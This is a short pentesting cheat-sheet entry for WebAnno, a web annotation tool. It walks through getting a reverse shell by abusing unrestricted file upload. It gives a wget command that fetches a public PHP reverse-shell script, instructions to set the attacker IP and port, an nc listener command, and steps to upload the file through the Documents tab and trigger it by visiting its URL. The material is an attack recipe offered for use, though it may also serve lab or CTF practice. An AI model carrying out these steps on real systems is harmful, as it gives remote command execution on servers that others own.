WebAnno Pentesting

Last modified: 2023-01-24


WebAnno is a web-based annotation tool for a wide range of linguistic annotations. The server uses the port 8080.

Default Credentials


Reverse Shell

If the target system opens the website assoated with WebAnno service, we can execute reverse shell by uploading the payload and access to the webpage hosts the payload.

1. Go to the Upload Screen in Dashboard

  1. Login
  2. Click “Projects”.
  3. Select the project in left pane.
  4. Click Documents tab.

2. Prepare Payload

WebAnno allows us to upload arbitrary file format, so we can upload PHP file for reverse shell.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
vim shell.php

# Edit $ip and $port in editor.

Then start listener in local machine.

nc -lvnp 4444

3. Upload the Payload

In WebAnno dashboard, upload the PHP file in the Documents page.

4. Access to the Payload File in Another Server

For instance, access to http://sub.example.com/path/to/shell.php, we can get a shell in the local terminal.